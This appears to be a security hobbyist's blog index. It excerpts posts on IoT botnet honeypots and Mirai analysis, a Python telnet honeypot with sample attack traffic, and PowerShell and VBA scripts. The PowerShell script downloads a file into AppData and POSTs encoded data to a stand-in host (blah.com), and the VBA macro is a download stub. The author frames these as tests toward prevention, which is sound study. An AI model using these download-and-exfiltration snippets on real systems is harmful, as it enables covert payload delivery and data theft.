Posts

Powershell - Uninstall Packages Remotely

Recently I have been looking for a more efficient way to view the packages a user has installed on their computer and then uninstall them remotely, without taking up the user's time with a remote interactive session.

I have written the below Powershell script, which prompts you for the name or IP address of the computer you are working with.  It then displays the installed programs (note that the script lets you filter by a package name, such as Java).  You can then name the package or packages you would like to uninstall.  If your user account is recognized as a local administrator on the target computer you should have no trouble; the script also lets you supply other credentials if necessary.
#Powershell program to remove packages that are specified by the user
function remove-Package($package, $compName, $credName) {
    If ($credName -eq $env:USERNAME) {
        $s = Get-WmiObject -Class Win32_Product -ComputerName $compN…

IoT Malware Analysis - CnC Server - Part 3

Using the strings gathered from inside the binaries, I began searching Google for the unique ones.  One of the unique strings I searched for was "HTTPFLOOD GHP".  This returned fewer than 10 results, and the first was from the site hxxp://psbdmp.com/wT1htV9b, which contained the source code for what they called "Palkia Server.c".


According to the timestamp on the paste, this particular piece of source code was leaked on 2016-11-12 09:58:05.  I have not validated that the binary in which I found the string matches this particular CnC server source code.

After reading the source code, understanding its logic, and verifying that it contained no backdoors or other attempts to infect my systems, I compiled it on a temporary server.  On execution you specify the port it listens on for bot connections and the number of threads it will use.


After you specify the port and the number of threads it begins to …

IoT Malware Analysis - Observations and Statistics - Part 2

In the previous post I used a Python program to emulate a telnet server, captured the commands sent to it, and then used those commands to research the binaries that were collected.

In this post I describe what happened when two of my servers became infected with the malware, and give statistics on the username and password combinations used and on which IP addresses I observed most often attempting to log in to my telnet server.

The Mirai botnet is known for launching Distributed Denial of Service (DDoS) attacks, and that is exactly what happened with both of my infected honeypot servers.


As you can see in the screenshot above, upon initial infection of the server the command "SCANNER ON" is sent.  This command causes the infected device to begin scanning random IP addresses to see if port 23 is open.  If the device can be reached over port 23 then a basic script of logging in, s…

IoT Malware Analysis - Botnets being created through weak credentials... - Part 1

I became curious about IoT malware spreading through default usernames and passwords after reading multiple media articles.  So I spun up a VPS and started using telnetlogger, a tool created by Robert David Graham.  Immediately I saw a constant barrage of traffic.  The next question I had was: what commands are being executed on these IoT devices?

I first evaluated the telnetlogger source code on GitHub to see whether I wanted to rewrite part of it to log the incoming commands.  I then searched for a honeypot that would emulate a telnet server, and finally decided to write my own in Python.  It is not perfect, but it logs up to 9 commands after a successful login.  The source code can be found on my GitHub page.
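The logging described above, and the credential and source-IP counts reported in the Part 2 post, as an added example that is not the author's honeypot (that code is on their GitHub page) and not telnetlogger: a line-fed telnet login emulator that accepts any username and password, records up to 9 commands after the "login", and then tallies (user, pass) pairs and source IPs across sessions. The prompts, the 9-command hard cap, the unprivileged port 2323, and the SAMPLE_ATTEMPTS traffic are assumptions constructed here, not captured data.

```python
import re
import socket
import threading
from collections import Counter

MAX_COMMANDS = 9                    # assumption: hard cap modelled on the post's "up to 9 commands"
LOGIN_PROMPT = b"\r\nlogin: "
PASSWORD_PROMPT = b"\r\nPassword: "
SHELL_PROMPT = b"\r\n# "
# Telnet option negotiation: IAC (0xff) + WILL/WONT/DO/DONT (0xfb-0xfe) + option byte.
# Bots send these before the username; they are not part of any credential or command.
IAC_NEGOTIATION = re.compile(rb"\xff[\xfb-\xfe].", re.DOTALL)

RECORDS = []                        # completed session records (constructed in-memory log)


class TelnetSession:
    """Line-fed state machine: login -> password -> shell. Every login 'succeeds'."""

    def __init__(self, peer_ip):
        self.peer_ip = peer_ip
        self.state = "login"
        self.username = None
        self.password = None
        self.commands = []
        self.closed = False

    def feed(self, raw_line):
        """Consume one client line (bytes); return the bytes to send back."""
        text = IAC_NEGOTIATION.sub(b"", raw_line).strip(b"\r\n").decode("latin-1")
        if self.state == "login":
            self.username, self.state = text, "password"
            return PASSWORD_PROMPT
        if self.state == "password":
            self.password, self.state = text, "shell"
            return SHELL_PROMPT      # always succeeds: that is what lures the bot into sending commands
        if text:
            self.commands.append(text)
        if len(self.commands) >= MAX_COMMANDS:
            self.closed = True       # stop recording once the cap is reached
            return b""
        return SHELL_PROMPT

    def record(self):
        return {"ip": self.peer_ip, "user": self.username,
                "pass": self.password, "commands": list(self.commands)}


def run_session(peer_ip, client_lines):
    """Drive one session offline from a list of raw client lines; returns its record."""
    s = TelnetSession(peer_ip)
    for line in client_lines:
        if s.closed:
            break
        s.feed(line)
    return s.record()


def credential_stats(records):
    """Counters of (user, pass) pairs and of source IPs, as reported in Part 2."""
    creds = Counter((r["user"], r["pass"]) for r in records)
    ips = Counter(r["ip"] for r in records)
    return creds, ips


def handle(conn, addr):
    """Real TCP handler around the state machine (one thread per client)."""
    session, buf = TelnetSession(addr[0]), b""
    with conn:
        conn.settimeout(30)          # bots that stall after login do not pin a thread forever
        conn.sendall(LOGIN_PROMPT)
        try:
            while not session.closed:
                data = conn.recv(1024)
                if not data:
                    break
                buf += data
                while b"\n" in buf and not session.closed:
                    line, buf = buf.split(b"\n", 1)
                    conn.sendall(session.feed(line))
        except (socket.timeout, OSError):
            pass
    RECORDS.append(session.record())


def serve(port=2323, bind="0.0.0.0"):
    """Listen on an unprivileged port; redirect TCP/23 to it with a firewall rule."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(64)
        while True:
            conn, addr = srv.accept()
            threading.Thread(target=handle, args=(conn, addr), daemon=True).start()


# Constructed sample traffic (not captured data): three sessions, two sharing a credential.
SAMPLE_ATTEMPTS = [
    ("203.0.113.5", [b"\xff\xfb\x18root\r\n", b"xc3511\r\n", b"enable\r\n", b"sh\r\n",
                     b"/bin/busybox ECCHI\r\n"]),
    ("203.0.113.5", [b"admin\r\n", b"admin\r\n", b"enable\r\n"]),
    ("198.51.100.7", [b"root\r\n", b"xc3511\r\n"] + [b"cmd%d\r\n" % i for i in range(12)]),
]


def demo():
    """Replay the constructed sessions offline and return the records plus both counters."""
    records = [run_session(ip, lines) for ip, lines in SAMPLE_ATTEMPTS]
    return records, credential_stats(records)
```

Run `serve()` to listen for real connections; the session logic is kept separate from the socket code so the prompt handling and the command cap can be checked offline with `demo()` before exposing the listener.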

After running this telnet emulator for less than 48 hours I had logged some interesting commands that were trying to download a shell script to then pull down additional binaries that …

Powershell - Scripts to Download and Save a File AND POST Data to a Web Page

Recently I created a couple of simple Powershell scripts: one to download and save a file, and one to send a POST request to a site.  Below are the scripts that I created.

$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")
# Go through the system proxy with the current user's network credentials
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$response = $wc.DownloadString("http://blah.com/master.txt")
Set-Content -Value $response -Path $env:APPDATA\Microsoft\output.txt
---
$url = "http://blah.com/"
$encodedData = "b3V0Ym91bmQ%3d"
# Form fields for the POST body
$params = New-Object System.Collections.Specialized.NameValueCollection
$params.Add('poster','blah55')
$params.Add('syntax','text')
$params.Add('content',$encodedData)
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credent…

VBA - Script to Download a file from a URL

Below is a Visual Basic for Applications script I quickly built to download a file to the computer through a macro.  This was to test whether it could be done and to find a way to prevent it from occurring.

Sub dFile()
'
' vTest Macro
'
    Dim dURL As String
    Dim WinHttpReq As Object
    Dim oStream As Object
    Dim fileName As String

    dURL = "http://blah/text.zip"
    fileName = Environ("AppData") & "\microsoft\text.zip"

    ' Fetch the file over HTTP (synchronously, so Status is valid right after send)
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", dURL, False
    WinHttpReq.send

    ' Write the response body to disk as a binary stream
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1                ' adTypeBinary
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile fileName, 2  ' adSaveCreateOverWrite
        oStream.Close
    End If
End Sub

Python - Script to Send an Email through Gmail

Below is a Python script that I was using to send an email through a Gmail account:

#!/usr/bin/python3

import os
import smtplib
import ssl
from email.message import EmailMessage

fromAddress = 'email@gmail.com'
toAddress = 'ltrappett@gmail.com'

# Build a proper RFC 5322 message; a bare string has no From/To headers
msg = EmailMessage()
msg['From'] = fromAddress
msg['To'] = toAddress
msg.set_content('To another email address.')

username = 'email@gmail.com'
# Gmail app-specific password, read from the environment rather than stored in the script
password = os.environ['GMAIL_APP_PASSWORD']

# Verify the server certificate when upgrading to TLS
context = ssl.create_default_context()
with smtplib.SMTP('smtp.gmail.com', 587) as server:
    server.starttls(context=context)
    server.login(username, password)
    server.send_message(msg)